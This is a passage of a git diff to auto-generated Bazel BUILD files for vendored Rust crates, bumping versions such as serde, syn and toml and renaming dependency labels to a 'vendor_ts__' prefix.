"@vendor_ts__countme-3.0.1//:countme", + "@vendor_ts__hashbrown-0.14.5//:hashbrown", + "@vendor_ts__memoffset-0.9.1//:memoffset", + "@vendor_ts__rustc-hash-1.1.0//:rustc_hash", + "@vendor_ts__text-size-1.1.1//:text_size", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-hash-2.1.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-hash-2.1.1.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-hash-2.1.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-hash-2.1.1.bazel index 37220a441d57..4fef93e46326 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-hash-2.1.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-hash-2.1.1.bazel @@ -83,5 +83,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "2.1.0", + version = "2.1.1", ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-stable-hash-0.1.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-stable-hash-0.1.1.bazel new file mode 100644 index 000000000000..82ce1ee93122 --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-stable-hash-0.1.1.bazel 
@@ -0,0 +1,83 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "rustc_stable_hash", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=rustc-stable-hash", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + 
"@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.1.1", +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc_apfloat-0.2.1+llvm-462a31f5a5ab.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc_apfloat-0.2.1+llvm-462a31f5a5ab.bazel index 37b394fcebad..00e80306ea45 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc_apfloat-0.2.1+llvm-462a31f5a5ab.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc_apfloat-0.2.1+llvm-462a31f5a5ab.bazel 
@@ -82,9 +82,9 @@ rust_library( }), version = "0.2.1+llvm-462a31f5a5ab", deps = [ - "@vendor__bitflags-1.3.2//:bitflags", - "@vendor__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:build_script_build", - "@vendor__smallvec-1.13.2//:smallvec", + "@vendor_ts__bitflags-1.3.2//:bitflags", + "@vendor_ts__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:build_script_build", + "@vendor_ts__smallvec-1.14.0//:smallvec", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ryu-1.0.18.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ryu-1.0.19.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ryu-1.0.18.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ryu-1.0.19.bazel index 95adbd009780..eb7d8b9c8f12 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ryu-1.0.18.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ryu-1.0.19.bazel @@ -79,5 +79,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.18", + version = "1.0.19", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.same-file-1.0.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.same-file-1.0.6.bazel index 416211ad6a0f..823e6471df3b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.same-file-1.0.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.same-file-1.0.6.bazel 
@@ -82,13 +82,13 @@ rust_library( version = "1.0.6", deps = select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__winapi-util-0.1.9//:winapi_util", # cfg(windows) + "@vendor_ts__winapi-util-0.1.9//:winapi_util", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__winapi-util-0.1.9//:winapi_util", # cfg(windows) + "@vendor_ts__winapi-util-0.1.9//:winapi_util", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__winapi-util-0.1.9//:winapi_util", # cfg(windows) + "@vendor_ts__winapi-util-0.1.9//:winapi_util", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.semver-1.0.24.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.semver-1.0.24.bazel index 2ebe5dba7841..c05cc8b555ee 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.semver-1.0.24.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.semver-1.0.24.bazel @@ -87,8 +87,8 @@ rust_library( }), version = "1.0.24", deps = [ - "@vendor__semver-1.0.24//:build_script_build", - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__semver-1.0.24//:build_script_build", + "@vendor_ts__serde-1.0.218//:serde", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde-1.0.217.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde-1.0.218.bazel similarity index 96% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde-1.0.217.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde-1.0.218.bazel index d11c7ab0b963..df8589a8859e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde-1.0.217.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde-1.0.218.bazel 
@@ -39,7 +39,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__serde_derive-1.0.217//:serde_derive", + "@vendor_ts__serde_derive-1.0.218//:serde_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -90,9 +90,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.217", + version = "1.0.218", deps = [ - "@vendor__serde-1.0.217//:build_script_build", + "@vendor_ts__serde-1.0.218//:build_script_build", ], ) @@ -148,7 +148,7 @@ cargo_build_script( "noclippy", "norustfmt", ], - version = "1.0.217", + version = "1.0.218", visibility = ["//visibility:private"], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_derive-1.0.217.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_derive-1.0.218.bazel similarity index 95% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_derive-1.0.217.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_derive-1.0.218.bazel index 5e70c8e29a67..ec591a096a13 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_derive-1.0.217.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_derive-1.0.218.bazel @@ -82,10 +82,10 @@ rust_proc_macro( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.217", + version = "1.0.218", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_json-1.0.135.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_json-1.0.139.bazel similarity index 94% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_json-1.0.135.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_json-1.0.139.bazel index 8acb6187cdd9..747fcb93840c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_json-1.0.135.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_json-1.0.139.bazel @@ -85,13 +85,13 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.135", + version = "1.0.139", deps = [ - "@vendor__itoa-1.0.14//:itoa", - "@vendor__memchr-2.7.4//:memchr", - "@vendor__ryu-1.0.18//:ryu", - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_json-1.0.135//:build_script_build", + "@vendor_ts__itoa-1.0.14//:itoa", + "@vendor_ts__memchr-2.7.4//:memchr", + "@vendor_ts__ryu-1.0.19//:ryu", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__serde_json-1.0.139//:build_script_build", ], ) @@ -145,7 +145,7 @@ cargo_build_script( "noclippy", "norustfmt", ], - version = "1.0.135", + version = "1.0.139", visibility = ["//visibility:private"], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_spanned-0.6.8.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_spanned-0.6.8.bazel index e0565b9afff0..f57f3f118ffa 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_spanned-0.6.8.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_spanned-0.6.8.bazel @@ -84,6 +84,6 @@ rust_library( }), version = "0.6.8", deps = [ - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__serde-1.0.218//:serde", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with-3.12.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with-3.12.0.bazel index 8a6cf4d7f4dc..913a64f240a8 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with-3.12.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with-3.12.0.bazel @@ -37,8 +37,8 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__serde_derive-1.0.217//:serde_derive", - "@vendor__serde_with_macros-3.12.0//:serde_with_macros", + "@vendor_ts__serde_derive-1.0.218//:serde_derive", + "@vendor_ts__serde_with_macros-3.12.0//:serde_with_macros", ], rustc_flags = [ "--cap-lints=allow", @@ -91,6 +91,6 @@ rust_library( }), version = "3.12.0", deps = [ - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__serde-1.0.218//:serde", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with_macros-3.12.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with_macros-3.12.0.bazel index c4748cafea99..28a15ef4179e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with_macros-3.12.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_with_macros-3.12.0.bazel @@ -81,9 +81,9 @@ rust_proc_macro( }), version = "3.12.0", deps = [ - "@vendor__darling-0.20.10//:darling", - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__darling-0.20.10//:darling", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_yaml-0.9.34+deprecated.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_yaml-0.9.34+deprecated.bazel index d1d5a34b6a64..9a863536b9e2 100644 
--- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_yaml-0.9.34+deprecated.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.serde_yaml-0.9.34+deprecated.bazel @@ -81,10 +81,10 @@ rust_library( }), version = "0.9.34+deprecated", deps = [ - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itoa-1.0.14//:itoa", - "@vendor__ryu-1.0.18//:ryu", - "@vendor__serde-1.0.217//:serde", - "@vendor__unsafe-libyaml-0.2.11//:unsafe_libyaml", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itoa-1.0.14//:itoa", + "@vendor_ts__ryu-1.0.19//:ryu", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__unsafe-libyaml-0.2.11//:unsafe_libyaml", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sharded-slab-0.1.7.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sharded-slab-0.1.7.bazel index af217a122bbb..e978ca25cd6e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sharded-slab-0.1.7.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sharded-slab-0.1.7.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.1.7", deps = [ - "@vendor__lazy_static-1.5.0//:lazy_static", + "@vendor_ts__lazy_static-1.5.0//:lazy_static", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.smallvec-1.13.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.smallvec-1.14.0.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.smallvec-1.13.2.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.smallvec-1.14.0.bazel index 6c353706f276..1e4a6aa9f73c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.smallvec-1.13.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.smallvec-1.14.0.bazel @@ -84,5 +84,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.13.2", + version = "1.14.0", ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sptr-0.3.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sptr-0.3.2.bazel deleted file mode 100644 index 6f9bfbbbe67f..000000000000 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sptr-0.3.2.bazel +++ /dev/null 
@@ -1,86 +0,0 @@ -############################################################################### -# @generated -# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To -# regenerate this file, run the following: -# -# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors -############################################################################### - -load("@rules_rust//rust:defs.bzl", "rust_library") - -package(default_visibility = ["//visibility:public"]) - -rust_library( - name = "sptr", - srcs = glob( - include = ["**/*.rs"], - allow_empty = True, - ), - compile_data = glob( - include = ["**"], - allow_empty = True, - exclude = [ - "**/* *", - ".tmp_git_root/**/*", - "BUILD", - "BUILD.bazel", - "WORKSPACE", - "WORKSPACE.bazel", - ], - ), - crate_features = [ - "default", - ], - crate_root = "src/lib.rs", - edition = "2018", - rustc_flags = [ - "--cap-lints=allow", - ], - tags = [ - "cargo-bazel", - "crate-name=sptr", - "manual", - "noclippy", - "norustfmt", - ], - target_compatible_with = select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [], - "@rules_rust//rust/platform:aarch64-apple-ios": [], - "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], - "@rules_rust//rust/platform:aarch64-linux-android": [], - "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], - "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], - "@rules_rust//rust/platform:aarch64-unknown-uefi": [], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:armv7-linux-androideabi": [], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:i686-apple-darwin": [], - "@rules_rust//rust/platform:i686-linux-android": [], - "@rules_rust//rust/platform:i686-pc-windows-msvc": [], - 
"@rules_rust//rust/platform:i686-unknown-freebsd": [], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], - "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], - "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], - "@rules_rust//rust/platform:thumbv7em-none-eabi": [], - "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], - "@rules_rust//rust/platform:wasm32-unknown-unknown": [], - "@rules_rust//rust/platform:wasm32-wasip1": [], - "@rules_rust//rust/platform:x86_64-apple-darwin": [], - "@rules_rust//rust/platform:x86_64-apple-ios": [], - "@rules_rust//rust/platform:x86_64-linux-android": [], - "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], - "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-none": [], - "@rules_rust//rust/platform:x86_64-unknown-uefi": [], - "//conditions:default": ["@platforms//:incompatible"], - }), - version = "0.3.2", -) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.syn-2.0.96.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.syn-2.0.98.bazel similarity index 95% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.syn-2.0.96.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.syn-2.0.98.bazel index bb6dc0c98bfc..c241c8b14aac 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.syn-2.0.96.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.syn-2.0.98.bazel 
@@ -91,10 +91,10 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "2.0.96", + version = "2.0.98", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__unicode-ident-1.0.14//:unicode_ident", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__unicode-ident-1.0.16//:unicode_ident", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.synstructure-0.13.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.synstructure-0.13.1.bazel index 8c2e97f71a09..0f6f912481fb 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.synstructure-0.13.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.synstructure-0.13.1.bazel @@ -85,8 +85,8 @@ rust_library( }), version = "0.13.1", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-1.0.69.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-1.0.69.bazel index 40eb0932ca58..a79c49f5eeaf 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-1.0.69.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-1.0.69.bazel @@ -32,7 +32,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__thiserror-impl-1.0.69//:thiserror_impl", + "@vendor_ts__thiserror-impl-1.0.69//:thiserror_impl", ], rustc_flags = [ "--cap-lints=allow", @@ -85,7 +85,7 @@ rust_library( }), version = "1.0.69", deps = [ - "@vendor__thiserror-1.0.69//:build_script_build", + "@vendor_ts__thiserror-1.0.69//:build_script_build", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-impl-1.0.69.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-impl-1.0.69.bazel index 271f65c25271..cf0239a907b0 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-impl-1.0.69.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thiserror-impl-1.0.69.bazel @@ -81,8 +81,8 @@ rust_proc_macro( }), version = "1.0.69", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thread_local-1.1.8.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thread_local-1.1.8.bazel index e1c2a444f29c..93e058516c02 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thread_local-1.1.8.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.thread_local-1.1.8.bazel @@ -81,7 +81,7 @@ rust_library( }), version = "1.1.8", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", - "@vendor__once_cell-1.20.2//:once_cell", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__once_cell-1.20.3//:once_cell", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-0.3.37.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-0.3.37.bazel index fd77f693651e..83d1b0f07a4a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-0.3.37.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-0.3.37.bazel 
@@ -81,9 +81,9 @@ rust_library( }), version = "0.3.37", deps = [ - "@vendor__deranged-0.3.11//:deranged", - "@vendor__num-conv-0.1.0//:num_conv", - "@vendor__powerfmt-0.2.0//:powerfmt", - "@vendor__time-core-0.1.2//:time_core", + "@vendor_ts__deranged-0.3.11//:deranged", + "@vendor_ts__num-conv-0.1.0//:num_conv", + "@vendor_ts__powerfmt-0.2.0//:powerfmt", + "@vendor_ts__time-core-0.1.2//:time_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-macros-0.2.19.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-macros-0.2.19.bazel index ef0cfd707390..d35fd00eb5ea 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-macros-0.2.19.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.time-macros-0.2.19.bazel @@ -81,7 +81,7 @@ rust_proc_macro( }), version = "0.2.19", deps = [ - "@vendor__num-conv-0.1.0//:num_conv", - "@vendor__time-core-0.1.2//:time_core", + "@vendor_ts__num-conv-0.1.0//:num_conv", + "@vendor_ts__time-core-0.1.2//:time_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml-0.8.19.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml-0.8.20.bazel similarity index 93% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml-0.8.19.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml-0.8.20.bazel index 2b99894b5132..9755bbcbacf0 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml-0.8.19.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml-0.8.20.bazel 
@@ -84,11 +84,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.8.19", + version = "0.8.20", deps = [ - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_spanned-0.6.8//:serde_spanned", - "@vendor__toml_datetime-0.6.8//:toml_datetime", - "@vendor__toml_edit-0.22.22//:toml_edit", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__serde_spanned-0.6.8//:serde_spanned", + "@vendor_ts__toml_datetime-0.6.8//:toml_datetime", + "@vendor_ts__toml_edit-0.22.24//:toml_edit", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_datetime-0.6.8.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_datetime-0.6.8.bazel index e10e9d2c2d9f..2f1b87c6a2ed 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_datetime-0.6.8.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_datetime-0.6.8.bazel @@ -84,6 +84,6 @@ rust_library( }), version = "0.6.8", deps = [ - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__serde-1.0.218//:serde", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_edit-0.22.22.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_edit-0.22.24.bazel similarity index 92% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_edit-0.22.22.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_edit-0.22.24.bazel index f2ac65f16e1b..6ef0d9a44688 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_edit-0.22.22.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.toml_edit-0.22.24.bazel 
